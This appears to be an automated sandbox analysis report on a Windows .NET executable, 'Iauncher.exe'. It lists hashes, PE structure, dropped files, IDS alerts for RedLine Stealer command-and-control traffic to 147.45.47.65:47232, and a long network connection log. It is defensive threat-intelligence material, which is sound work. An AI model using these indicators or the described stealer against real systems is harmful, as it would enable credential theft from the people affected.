                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2662
                                                                                                                                                  Entropy (8bit):7.8230547059446645
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                                                                                                  MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                                                                                                  SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                                                                                                  SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                                                                                                  SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Process:C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):505344
                                                                                                                                                  Entropy (8bit):7.675139785236683
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:L4J4ZH65jJTA3St/9q8OH0UXHyo1wLnWXT23i5gk5EDuSXRa:E4ZGTtt/Y8cfh1wLn4T23i52B
                                                                                                                                                  MD5:D79977A15EB010C637CF9078B4EB82C8
                                                                                                                                                  SHA1:AE5672620C42C4BA2C2B8BD5B8FB3AD519C252B1
                                                                                                                                                  SHA-256:3F5012D3CFFBD993BFEFEAFC606D343BDC2A2E74B3A01A7DA4F3D31F601FB5DD
                                                                                                                                                  SHA-512:D120A994969376884822DC3C4A1E333F6E99A4367FF95BDCCE726BBAF60E68C055656D553A69D6A9FB59825B7AFA9732AF56E5C43C99A7951895F60C0B607199
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Reputation:low
Preview:MZ ... !This program cannot be run in DOS mode. ... Rich ... PE..L ... .text ... .bss ... .rdata ... .data ... .bsS ... .rsrc ... .reloc ... (non-printable bytes omitted)
                                                                                                                                                  Process:C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):418397
                                                                                                                                                  Entropy (8bit):7.999431817473085
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:12288:vxSs1o7rStD9+8Oz0QXHyo1wLzWXTeJibgk5EDlPIMi:pftDw8Whh1wLz4TeJibiPIMi
                                                                                                                                                  MD5:B8C12D614B71C08CE95A396873943237
                                                                                                                                                  SHA1:773D0890D34B2C2420F7CF4009C03D5041D67DC2
                                                                                                                                                  SHA-256:90FA59DD99A23C733F6E2274A3B64D5DB70A15FD9C5BF3B68AE3EFA984B5D311
                                                                                                                                                  SHA-512:FF07BFF6326131AFBBBA4F71463FEEC6FC38D30C7A987D72A1CC648901CCEBF788FF3B01C92680FE9C14C7C433419AF270B3A78346167A864A35792902DDEA2C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
Preview:PK ... Iauncher.exe ... (compressed data omitted)
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2251
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:0158FE9CEAD91D1B027B795984737614
                                                                                                                                                  SHA1:B41A11F909A7BDF1115088790A5680AC4E23031B
                                                                                                                                                  SHA-256:513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
                                                                                                                                                  SHA-512:C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Entropy (8bit):7.894923776387099
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                  File name:Iauncher.exe
                                                                                                                                                  File size:732'672 bytes
                                                                                                                                                  MD5:e69feb7fd40f408a088d879be323f37a
                                                                                                                                                  SHA1:0f71fa75df6795c43c69e7ec5689c995c135079e
                                                                                                                                                  SHA256:463dd34a95d86ca5d08059f1ec80d3b00d3bbabdc74936025b7e30ef2b3ee931
                                                                                                                                                  SHA512:6840d2b2e00c47d83298833a99309c22028499fa9f0022ea76f9a91bc73a33e414d2168e941bebbf1191229d2f0f6397dc645dc087f7fdd4c4996a82a733b252
                                                                                                                                                  SSDEEP:12288:klkQRVR3DXMZ6GQ6ov2m+UtbVkGDvAd1si+tS:kdVR3bQUv2gVbAdtu
                                                                                                                                                  TLSH:06F41268C3A84E3AE3A903FCA8720546E7755A167166F70FBE8A70F5001476EE6053DF
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...6............."...0.................. ... ....@.. ....................................`................................
                                                                                                                                                  Icon Hash:60959501a1964333
                                                                                                                                                  Entrypoint:0x4b1dbe
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                  Time Stamp:0xACDA9736 [Wed Nov 23 21:25:10 2061 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:4
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:4
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                  Instruction
                                                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                                                  add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb1d64 | 0x57 | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb2000 | 0x2a8a | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb6000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xafdc4 | 0xafe00 | 2a7bbfb24e2715f1dbd62ac9328337dd | False | 0.8865535603233831 | data | 7.90237020530487 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xb2000 | 0x2a8a | 0x2c00 | 6a686db17d55b66f27706194ba083ead | False | 0.8994140625 | data | 7.551675563345795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xb6000 | 0xc | 0x200 | 6e02a915760e68cd6298eeaf6e733d8c | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xb2130 | 0x2476 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9996785943861153 |
| RT_GROUP_ICON | 0xb45a8 | 0x14 | data | | | 1.05 |
| RT_VERSION | 0xb45bc | 0x2e4 | data | | | 0.4472972972972973 |
| RT_MANIFEST | 0xb48a0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 05/01/24-20:35:54.029434 | TCP | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 47232 | 49711 | 147.45.47.65 | 192.168.2.7 |
| 05/01/24-20:35:53.101816 | TCP | 2046045 | ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) | 49711 | 47232 | 192.168.2.7 | 147.45.47.65 |
| 05/01/24-20:36:00.399690 | TCP | 2046056 | ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) | 47232 | 49711 | 147.45.47.65 | 192.168.2.7 |
| 05/01/24-20:36:05.641411 | TCP | 2043231 | ET TROJAN Redline Stealer TCP CnC Activity | 49711 | 47232 | 192.168.2.7 | 147.45.47.65 |

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
                                                                                                                                                  May 1, 2024 20:35:44.027295113 CEST49702443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:44.027699947 CEST49702443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:44.027714968 CEST44349702193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:44.758315086 CEST44349702193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:44.760432005 CEST49702443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:44.760457039 CEST44349702193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:45.002799988 CEST44349702193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:45.002935886 CEST44349702193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:45.003001928 CEST49702443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:45.003509998 CEST49702443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:45.005516052 CEST49703443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:45.005553961 CEST44349703193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:45.005630970 CEST49703443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:45.005897999 CEST49703443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:45.005913019 CEST44349703193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:45.740026951 CEST44349703193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:45.741678953 CEST49703443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:45.741713047 CEST44349703193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:45.980688095 CEST44349703193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:45.980753899 CEST44349703193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:45.980916977 CEST49703443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:45.981369972 CEST49703443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:45.982662916 CEST49705443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:45.982702017 CEST44349705193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:45.982793093 CEST49705443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:45.983015060 CEST49705443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:45.983027935 CEST44349705193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:46.756118059 CEST44349705193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:46.757708073 CEST49705443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:46.757740974 CEST44349705193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:47.013592005 CEST44349705193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:47.013674021 CEST44349705193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:47.013856888 CEST49705443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:47.014815092 CEST49705443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:47.016081095 CEST49706443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:47.016122103 CEST44349706193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:47.016196012 CEST49706443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:47.016417980 CEST49706443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:47.016427994 CEST44349706193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:47.731729031 CEST44349706193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:47.733217001 CEST49706443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:47.733234882 CEST44349706193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:48.009030104 CEST44349706193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:48.009085894 CEST44349706193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:48.009161949 CEST49706443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:48.009598970 CEST49706443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:48.010869026 CEST49708443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:48.010902882 CEST44349708193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:48.010970116 CEST49708443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:48.011275053 CEST49708443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:48.011291027 CEST44349708193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:48.744637012 CEST44349708193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:48.748128891 CEST49708443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:48.748146057 CEST44349708193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:48.990933895 CEST44349708193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:48.991009951 CEST44349708193.109.246.100192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:48.991059065 CEST49708443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:48.991744995 CEST49708443192.168.2.7193.109.246.100
                                                                                                                                                  May 1, 2024 20:35:49.435406923 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:49.435447931 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:49.435825109 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:49.435825109 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:49.435861111 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:49.645272970 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:49.647030115 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:49.647030115 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:49.647067070 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:49.647305965 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:49.652107954 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:49.700128078 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.410818100 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.410876989 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.410916090 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.410936117 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:50.410952091 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.410963058 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.410993099 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:50.411031008 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.411060095 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.411068916 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:50.411083937 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.411134958 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:50.411258936 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.411318064 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.411358118 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.411358118 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:50.411366940 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.411411047 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:50.411423922 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.412137032 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.412178040 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.412193060 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:50.412228107 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.412266970 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.412272930 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:50.412281036 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.412324905 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:50.412332058 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.413019896 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.413058043 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.413072109 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:50.413085938 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.413122892 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.413130999 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:50.413141012 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.413187027 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:50.413814068 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.413898945 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.413929939 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.413943052 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:50.413959026 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.413992882 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.413996935 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:50.414004087 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.414052963 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:50.414657116 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.414800882 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.414832115 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.414844990 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:50.414861917 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.414902925 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:50.414923906 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.415623903 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.415662050 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.415669918 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:50.415679932 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.415723085 CEST49710443192.168.2.7172.67.202.98
                                                                                                                                                  May 1, 2024 20:35:50.415729046 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:50.415761948 CEST44349710172.67.202.98192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:53.093751907 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:35:53.101815939 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:35:53.357110023 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:54.029433966 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:35:54.072530031 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:00.194132090 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:00.399689913 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:00.399715900 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:00.399729967 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:00.399743080 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:00.399758101 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:00.399785042 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:00.399835110 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:02.712201118 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:02.914516926 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:02.914618015 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:02.914685011 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.116942883 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.117161036 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.117177010 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.117214918 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.117269039 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.117330074 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.319364071 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.319386959 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.319524050 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.319528103 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.319613934 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.319623947 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.319704056 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.319762945 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.319834948 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.319911003 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.319921017 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.320123911 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.320538044 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.320549965 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.320571899 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.320651054 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.523164988 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.523180962 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.523262024 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.523303986 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.523355007 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.523484945 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.523674965 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.523839951 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.524008989 CEST4723249711147.45.47.65192.168.2.7
                                                                                                                                                  May 1, 2024 20:36:03.524094105 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.524156094 CEST4971147232192.168.2.7147.45.47.65
                                                                                                                                                  May 1, 2024 20:36:03.524173021 CEST4723249711147.45.47.65192.168.2.7
